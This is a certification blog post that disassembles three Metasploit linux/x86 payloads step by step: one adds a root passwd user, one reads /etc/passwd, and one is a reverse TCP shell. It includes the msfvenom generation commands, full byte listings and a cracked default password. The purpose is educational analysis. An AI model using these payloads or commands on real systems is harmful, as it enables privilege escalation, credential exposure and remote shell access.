SLAE A.5 - MSF Payload Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1294

This fifth assignment is to analyse in detail three linux/x86 shellcodes created with the Metasploit Framework. Full commands are shown for generating the samples. These are also archived in the GitHub repo.

Three payloads were investigated:

linux/x86/adduser
linux/x86/read_file
linux/x86/shell_reverse_tcp

linux/x86/adduser

I generated an example of this payload using default parameters. This created a file adduser.raw.

# msfvenom -f raw -a x86 -p linux/x86/adduser -o adduser.raw
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
Saved as: adduser.raw

Working through the disassembly from the beginning…

# ndisasm -b 32 adduser.raw
00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx

ECX and EBX are cleared to zero.

00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80

This is a call to syscall 0x46 = 70, which is setreuid():

int setreuid(uid_t ruid, uid_t euid);

The two parameters are read from EBX and ECX, which are zero. This is a request to set the real and effective UIDs of the process to root (0).

This call is helpful when a process that was initially root drops its privileges temporarily (either on purpose or by error). It may still have 0 as its saved uid. In this case a call to setreuid() can restore the effective uid to 0. Errors are ignored.

00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx

Set up a new syscall 5—open():

int open(const char *pathname, int flags);

It’s constructing the pathname on the stack. It begins by zeroing ECX and pushing it to create a null terminator.

0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp

The 12 bytes of the filename are pushed onto the stack, and a pointer to them is stored in EBX. Equivalently:

char *filename = "\x2f\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

This is the string /etc//passwd. That’s the file it’s opening.
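The pushes can be replayed offline to confirm the string. This is a minimal Python sketch; the helper name `decode_pushed_dwords` is my own and not part of any tool. Each immediate is packed little-endian, and because the stack grows downward, the last value pushed ends up first in memory.

```python
import struct

def decode_pushed_dwords(pushed):
    """Rebuild the bytes that a run of `push dword` instructions leaves in memory.

    `pushed` lists the immediates in the order they were pushed. The last push
    sits at the lowest address, so the values are reversed before packing.
    """
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))

# Immediates from offsets 0x0F, 0x14 and 0x19 of the disassembly, in push order.
path = decode_pushed_dwords([0x64777373, 0x61702F2F, 0x6374652F])
print(path.decode("ascii"))
```

The doubled slash is harmless to the kernel and pads the path to a multiple of four bytes, so it fits exactly into three pushes.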

00000020  41                inc ecx
00000021  B504              mov ch,0x4

ECX is the flags parameter and until now it was 0. After these two operations it contains 0x0401. These flags are defined in the file /usr/include/i386-linux-gnu/bits/fcntl-linux.h. Unfortunately they are all in octal so I need to convert them. The two bits are 0x01 and 0x0400, or in octal 01 and 02000.

#define O_WRONLY             01
# define O_APPEND         02000

This means when the file is opened any writes will be placed at the end of the file. This makes sense since the shellcode will probably want to add an extra line for the new user.
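The register arithmetic and the octal conversion can be double-checked with a few lines of Python. This is only a sketch: the two constants are copied from the `#define` lines quoted above, and the function name is made up for illustration.

```python
# Flag values copied from the two #define lines quoted above (octal in the header).
O_WRONLY = 0o1
O_APPEND = 0o2000

def ecx_after_inc_and_mov_ch(ecx=0, ch=0x04):
    """Model `inc ecx` followed by `mov ch,0x4` on a 32-bit register."""
    ecx = (ecx + 1) & 0xFFFFFFFF            # inc ecx
    ecx = (ecx & 0xFFFF00FF) | (ch << 8)    # mov ch,imm8 replaces bits 8..15 only
    return ecx

flags = ecx_after_inc_and_mov_ch()
print(hex(flags), oct(flags), flags == (O_WRONLY | O_APPEND))
```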

00000023  CD80              int 0x80
00000025  93                xchg eax,ebx

The file is opened and the fd is stored in EBX. EAX now points to the file path but this is probably a side-effect. The xchg eax,ebx only requires 1 byte compared with 2 for mov ebx,eax.

00000026  E828000000        call 0x53

Now it gets interesting. The remainder of the shellcode is shown below. We are skipping over most of what’s left, and a lot of it looks like nonsense. This is probably data. The destination 0x53 is actually partway through an instruction so I need to disassemble this more carefully.

0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

I re-ran the disassembly starting at the call destination. I need to skip the first 0x53 bytes so that I start on the “59” opcode.

# ndisasm -b 32 -k 0,0x53 adduser.raw
00000000  skipping 0x53 bytes
00000053  59                pop ecx
00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

I see now that it is doing a pop ecx. The call a moment ago pushed the next address—the start of the data chunk—onto the stack. So now the address of that data is in ECX.

Let’s look at what that data actually is. It runs from 0x2B up to (but not including) 0x53, for a total length of 0x28 (40) bytes:

# strings -t x adduser.raw
	e Qhsswdh//pah/etc
	2b metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh

This is clearly a hard-coded line designed to be written to the passwd file. The new user will have root privileges (user and group 0). The username will be metasploit. A crypted password is provided.
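To make the fields explicit, the line can be split the way passwd(5) describes: seven colon-separated fields. The class and function names below are illustrative only.

```python
from typing import NamedTuple

class PasswdEntry(NamedTuple):
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

def parse_passwd_line(line: str) -> PasswdEntry:
    """Split one passwd(5) line into its seven colon-separated fields."""
    name, password, uid, gid, gecos, home, shell = line.rstrip("\n").split(":")
    return PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell)

entry = parse_passwd_line("metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\n")
print(entry)
```

The comment (gecos) field is empty, the home directory is `/`, and the login shell is `/bin/sh`.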

To find out what the password is we could just look at the payload options on msfvenom but we could also just bruteforce it.

root@kali:~/slae/assignments/a5-msf# cat >passwd
metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh
root@kali:~/slae/assignments/a5-msf# john passwd
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2])
Press 'q' or Ctrl-C to abort, almost any other key for status
metasplo         (metasploit)
1g 0:00:00:00 DONE 1/3 (2018-07-05 05:27) 100.0g/s 4200p/s 4200c/s 4200C/s metasplo..met4spl0
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So if this shellcode ran you could log on with metasploit/metasploit.

Moving along: we have a pointer to this string in ECX now.

00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80

It is setting up a syscall number 4, which is write().

ssize_t write(int fd, const void *buf, size_t count);

We already have the fd in EBX from earlier. ECX was set up to point to buf by the call followed by the pop. The remaining parameter is EDX, the buffer length. This is read from the 4 bytes immediately before the address in ECX, which are the 32-bit operand of the call instruction itself:

00000026  E828000000        call 0x53
            ^^^^^^^^ used as "count"

It isn’t an accident that 0x28 is the correct length—it was needed in order to neatly jump over it. So this is a clever way of inserting the length as part of an instruction to save space.

Note that this instruction contains null bytes so an encoding stage would probably be required to use this for normal shellcode purposes.
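The dual role of the call operand can be checked numerically. The sketch below rebuilds only the relevant fragment (the five-byte call plus the data that follows it) from the listings above. The variable names are mine, and the offsets are file offsets rather than run-time addresses.

```python
import struct

CALL_OFFSET = 0x26                        # where the call sits in adduser.raw
call_insn = bytes.fromhex("E828000000")   # opcode E8 + rel32, from the listing
# The passwd line from the strings output plus the trailing 0x0A seen at 0x52.
data = b"metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\n"

(rel32,) = struct.unpack("<i", call_insn[1:5])
return_addr = CALL_OFFSET + len(call_insn)   # pushed by call, later popped into ECX
target = return_addr + rel32                 # where execution resumes

# `mov edx,[ecx-0x4]` reads the dword that ends right where the data begins.
fragment = call_insn + data
ecx = len(call_insn)                         # index of the data inside `fragment`
(count,) = struct.unpack("<I", fragment[ecx - 4:ecx])

print(hex(return_addr), hex(target), hex(count), len(data))
```

The relative displacement and the byte count are the same dword, so the value that skips over the data is also exactly the length of the data.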

0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

Finally, syscall number 1, which is exit(). The program will terminate immediately and the open passwd file will be closed. The program’s return code will be the file descriptor from EBX. Presumably the author doesn’t care about that.

In summary, this shellcode will:

Restore root privileges if they were dropped temporarily
Open /etc/passwd for appending new data
Write a new line for a user called “metasploit” with uid and gid 0
Exit the program

linux/x86/read_file

This one errors unless I choose a PATH. I’m going to choose /etc/passwd. I’ll try to work out the specifics without looking at the payload options.

# msfvenom -f raw -a x86 -p linux/x86/read_file -o read_file.raw PATH=/etc/passwd
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 73 bytes
Saved as: read_file.raw

Now disassembling it:

# ndisasm -b 32 read_file.raw
00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

This shellcode begins with a jmp-call-pop sequence. The bytes from 0x3d onward, just after the call, look like a null-terminated string. And they are:

# strings -t x read_file.raw
	3d /etc/passwd

So that data on the end is just the path that I set when I generated the shellcode. The call 0x2 will push the address of this string onto the stack and jump up to 0x2.
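The two branch destinations in the jmp-call-pop sequence can be worked out by hand from the raw bytes. Here is a small sketch, assuming only the two encodings that appear in this payload (EB rel8 and E8 rel32); the function name is hypothetical.

```python
import struct

def branch_target(offset: int, insn: bytes) -> int:
    """Resolve the destination of a `jmp short` (EB rel8) or `call` (E8 rel32).

    The displacement is signed and relative to the address of the NEXT instruction.
    """
    if insn[0] == 0xEB:
        (rel,) = struct.unpack("<b", insn[1:2])
    elif insn[0] == 0xE8:
        (rel,) = struct.unpack("<i", insn[1:5])
    else:
        raise ValueError("only EB and E8 are handled in this sketch")
    return offset + len(insn) + rel

jmp_dest = branch_target(0x00, bytes.fromhex("EB36"))
call_dest = branch_target(0x38, bytes.fromhex("E8C5FFFFFF"))
string_addr = 0x38 + 5    # return address pushed by the call = start of the path
print(hex(jmp_dest), hex(call_dest), hex(string_addr))
```

The call displacement is negative (0xFFFFFFC5 is -0x3B), which is why this variant of the technique contains 0xFF bytes rather than nulls in the call itself.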

Looking at the middle part in smaller chunks:

00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80

It sets up for syscall 5, which is open(). The address of the path is popped into EBX. The second parameter, ECX, is the flags, which are zeroed out. This will open the file for reading (O_RDONLY = 0).

0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80

Another syscall. The file descriptor returned by open() is moved to EBX. 0x3 is moved to EAX, which means this is performing a read().

ssize_t read(int fd, void *buf, size_t count);

The current stack pointer is moved first to EDI, then to ECX (the buf parameter). A hard-coded count of 0x1000 (4096 bytes) is placed in EDX.

It is going to clobber whatever is currently on the stack with the first 4096 bytes of the file. It is not clear why EDI is used instead of moving ESP directly to ECX—neither ESP nor EDI is used again.

0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80

This is syscall 4, a write(). EBX is the fd to write to, which is 0x1 (STDOUT). The buffer is still in ECX. The length, however, is limited to the number of bytes actually read by read(). That count was returned in EAX, so EAX is moved to EDX.

At this point the up-to-4096 bytes are written to STDOUT (unless fd 1 has been redirected elsewhere).

0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80

The shellcode finishes with the exit() syscall, causing the program to terminate immediately. It takes care to use a return code of 0.

In summary, this shellcode will:

Open a file at a hard-coded path
Read up to 4096 bytes onto the stack
Write those bytes out to STDOUT
Exit
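The four steps above map directly onto thin wrappers in Python's `os` module. This is a rough functional equivalent for comparison, not a translation of the shellcode; the function name and the `out_fd` parameter are my own additions so that it can be exercised without terminating the interpreter.

```python
import os

def read_file_like_payload(path: str, out_fd: int = 1) -> int:
    """Mirror the payload's syscall sequence: open, read, write.

    Returns the number of bytes written. The real shellcode calls exit(0) here.
    """
    fd = os.open(path, os.O_RDONLY)    # syscall 5 with flags = 0
    buf = os.read(fd, 0x1000)          # syscall 3, one call, at most 4096 bytes
    written = os.write(out_fd, buf)    # syscall 4, count = bytes actually read
    os.close(fd)                       # not in the shellcode; exit() closes it there
    return written

if __name__ == "__main__":
    read_file_like_payload("/etc/passwd")
```

Like the payload, this issues a single read(), so a file larger than 4096 bytes is truncated rather than read in a loop.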

linux/x86/shell_reverse_tcp

For a reverse shell I’m going to need to specify the IP and port to connect to. I will choose 127.1.1.1:4444.

# msfvenom -f raw -a x86 -p linux/x86/shell_reverse_tcp -o shell_reverse_tcp.raw LHOST=127.1.1.1 LPORT=4444
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Saved as: shell_reverse_tcp.raw

Going through the disassembly from the beginning:

# ndisasm -b 32 shell_reverse_tcp.raw
00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx

This is a trick to zero out 3 registers with 2 instructions. EBX is zeroed explicitly. mul ebx will perform EAX * EBX and store the result across EDX and EAX. The answer will always be 0 so EDX and EAX are now 0 also.
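A quick model of the multiplication shows why the starting value of EAX does not matter. The sketch assumes the unsigned 32-bit form of `mul`, where the 64-bit product is split across EDX (high half) and EAX (low half).

```python
MASK32 = 0xFFFFFFFF

def mul_ebx(eax: int, ebx: int):
    """Model the unsigned 32-bit `mul ebx`: EDX:EAX = EAX * EBX."""
    product = (eax & MASK32) * (ebx & MASK32)
    return (product >> 32) & MASK32, product & MASK32   # (edx, eax)

# EAX holds an unknown value on entry; every value gives the same result.
for unknown_eax in (0, 1, 0xDEADBEEF, MASK32):
    ebx = 0                                  # xor ebx,ebx
    edx, eax = mul_ebx(unknown_eax, ebx)
    print(hex(unknown_eax), "->", (eax, ebx, edx))
```

The pair of instructions takes 4 bytes, whereas three separate `xor reg,reg` instructions would take 6.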

00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80

It sets up for syscall 0x66 = 102, which is socketcall(). I haven’t seen this before. Relevant snippets from the man page:

int socketcall(int call, unsigned long *args);

“socketcall() is a common kernel entry point for the socket system calls. call determines which socket function to invoke. args points to a block containing the actual arguments, which are passed through to the appropriate call.”

I located the constants for the call numbers in /usr/include/linux/net.h. EBX will be incremented to 1, and there is a corresponding constant:

#define SYS_SOCKET      1               /* sys_socket(2)                */

So this is just a compact way of calling socket(2). It can push the arguments onto the stack and pass the stack pointer as ECX.

It pushes the arguments in reverse order for socket(). These constants were explored thoroughly in assignment 1.

The number 0: “protocol”, where 0 selects the default protocol for the socket type (TCP for an AF_INET stream socket)
The number 1: “type”, SOCK_STREAM
The number 2: “domain”, AF_INET

In summary, this is going to open an AF_INET socket and an fd will be returned in EAX.
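The block of memory that ECX points at can be laid out explicitly. The sketch below uses the Linux constant values discussed in this section, written as plain integers so it does not depend on the platform's socket module. The helper name is hypothetical.

```python
import struct

# Linux values; SYS_SOCKET comes from the net.h line quoted earlier.
SYS_SOCKET = 1
AF_INET, SOCK_STREAM = 2, 1

def args_block_after_pushes(pushed):
    """Return the bytes at ESP after pushing `pushed` in order (last push first)."""
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))

# push ebx (0) ; inc ebx ; push ebx (1) ; push byte +0x2
args_block = args_block_after_pushes([0, 1, 2])
domain, sock_type, protocol = struct.unpack("<3I", args_block)

print(args_block.hex())
print("socketcall(%d, args) -> socket(%d, %d, %d)" % (SYS_SOCKET, domain, sock_type, protocol))
```

Because the arguments are pushed in reverse, they end up in memory in the same order as the C prototype, which is what socketcall() expects for its args pointer.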

0000000F  93                xchg eax,ebx
00000010  59                pop ecx
00000011  B03F              mov al,0x3f
00000013  CD80              int 0x80

The syscall number is updated to 0x3f = 63, or dup2(). As seen in assignment 2, file descriptors will need to be redirected before launching the shell.

EBX is the oldfd to be duplicated. It is set to the socket that was just returned in EAX.

ECX is the newfd to be replaced. It pops the 0x2 off the stack, taking advantage of the fact that both AF_INET and the STDERR file descriptor are the number 2.

It executes dup2(), so now any STDERR output will be diverted to the (as yet unconnected) socket.

00000015  49                dec ecx
00000016  79F9              jns 0x11

The newfd is decremented from 2 to 1. As long as this doesn’t produce a negative number, JNS will perform a jump. It will go back to 0x11, which sets the syscall number and runs dup2() again. Now STDOUT is also diverted to the socket.

newfd decrements from 1 to 0. The sign flag is still not set so it loops again and STDIN is diverted to the socket.

Finally it decrements to -1. JNS does nothing and execution continues.
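The loop is easy to trace by hand. This sketch records the argument pairs that each pass would hand to dup2(). The socket fd value of 3 is only an assumed example, since the real value depends on what the process already has open.

```python
def dup2_loop(sockfd: int, first_newfd: int = 2):
    """Trace the (oldfd, newfd) pairs passed to dup2 by the loop at 0x11..0x16."""
    calls = []
    ecx = first_newfd                  # pop ecx picked up the 2 left on the stack
    while True:
        calls.append((sockfd, ecx))    # mov al,0x3f ; int 0x80 -> dup2(ebx, ecx)
        ecx -= 1                       # dec ecx sets the sign flag once ecx hits -1
        if ecx < 0:                    # jns 0x11 falls through when SF is set
            break
    return calls

print(dup2_loop(sockfd=3))             # sockfd=3 is an assumed example value
```

Re-executing `mov al,0x3f` on every pass matters because EAX is overwritten by the return value of each dup2() call.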

00000018  687F010101        push dword 0x101017f
0000001D  680200115C        push dword 0x5c110002
00000022  89E1              mov ecx,esp
00000024  B066              mov al,0x66
00000026  50                push eax
00000027  51                push ecx
00000028  53                push ebx
00000029  B303              mov bl,0x3
0000002B  89E1              mov ecx,esp
0000002D  CD80              int 0x80

Next, a variety of data is arranged on the stack before using socketcall again. Looking at the bottom first, this time EBX is set to 0x3. This corresponds to the call:

#define SYS_CONNECT     3               /* sys_connect(2)               */

It is now effectively doing a connect(), but it is going via this syscall that takes its arguments via a pointer to memory.

Looking back at the top of this section it first prepares a struct sockaddr_in on the stack. Only the first 8 bytes are relevant so it pushes 8 bytes.

push dword 0x101017f

This is the packed IP address 127.1.1.1. (Read each byte in reverse order)

push dword 0x5c110002

0x0002 = AF_INET (the address family is stored in host byte order, which is little endian on x86)
0x5c11 = 4444 in network byte order = big endian
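The mixed byte orders are easier to see when the eight bytes are laid out as they sit in memory. A short sketch using only the two immediates from the listing:

```python
import socket
import struct

# The struct as it sits in memory: the second push ends up at the lower address.
sockaddr = struct.pack("<II", 0x5C110002, 0x0101017F)

(family,) = struct.unpack("<H", sockaddr[0:2])   # sin_family, host byte order
(port,) = struct.unpack(">H", sockaddr[2:4])     # sin_port, network byte order
ip = socket.inet_ntoa(sockaddr[4:8])             # sin_addr, network byte order

print(sockaddr.hex(), family, port, ip)
```

Only the port and the address are big endian. The family field is read by the local kernel and never travels on the wire, so it stays in host order.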

connect() will need a pointer to the struct. It is currently located at the top of the stack so ESP is saved to ECX temporarily.

The three parameters to connect() are pushed in reverse order:

EAX = addrlen = 0x66. Presumably having an addrlen that is larger than actually required is fine.
ECX = addr = pointer to the struct sockaddr_in
EBX = sockfd = the fd returned from the previous “socket” call

With any luck, when it returns, a TCP connection has been established to the remote listener.

0000002F  52                push edx
00000030  686E2F7368        push dword 0x68732f6e
00000035  682F2F6269        push dword 0x69622f2f
0000003A  89E3              mov ebx,esp
0000003C  52                push edx
0000003D  53                push ebx
0000003E  89E1              mov ecx,esp
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80

The remaining shellcode appears to assume that the connection succeeded. (It doesn’t have many options, after all.) Looking just before the int 0x80, it is setting up the syscall 0xb = 11 which is execve(). This is familiar code.

EDX has contained 0 since the very beginning. It is pushed to the stack to provide a null termination for the path string. Due to pushing backwards and endianness the path must be read backwards: “\x2f\x2f\x62\x69\x6e\x2f\x73\x68”. This is the string //bin/sh, now on top of the stack.

ESP is stored into EBX to act as the path of the program to be executed.

Another null is placed on the stack, followed by a pointer to the path. Together, this is the argv array. ESP is stored into ECX, so it now contains a pointer to the array.

EDX = envp is permitted to remain null.
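To see how the path and the argv array end up relative to each other, the pushes can be replayed against a toy stack. Everything here is illustrative: the `Stack` class is my own, and the starting address 0x1000 is arbitrary.

```python
import struct

class Stack:
    """Tiny model of a downward-growing 32-bit stack (addresses are made up)."""
    def __init__(self, esp=0x1000):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        for i, byte in enumerate(struct.pack("<I", value)):
            self.mem[self.esp + i] = byte

    def dword(self, addr):
        return struct.unpack("<I", bytes(self.mem[addr + i] for i in range(4)))[0]

    def cstring(self, addr):
        out = bytearray()
        while self.mem[addr] != 0:
            out.append(self.mem[addr])
            addr += 1
        return bytes(out)

s = Stack()
edx = 0
s.push(edx)           # null terminator for the path
s.push(0x68732F6E)    # "n/sh"
s.push(0x69622F2F)    # "//bi"
ebx = s.esp           # filename argument
s.push(edx)           # argv[1] = NULL
s.push(ebx)           # argv[0] = pointer to the path
ecx = s.esp           # argv argument

print(s.cstring(ebx), hex(s.dword(ecx)), s.dword(ecx + 4))
```

The model shows argv[0] pointing back at the path string 8 bytes above it, with a null pointer terminating the array.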

Finally the execve() is called. The new program will replace the current one and control will never return here. It will inherit the socket and the redirected file descriptors, so STDIN, STDOUT and STDERR will all be carried over the network connection.

In summary, this shellcode will:

Obtain an AF_INET socket
Redirect STDIN/OUT/ERR to that socket
Make a TCP connection to a hardcoded IP and port
Execute /bin/sh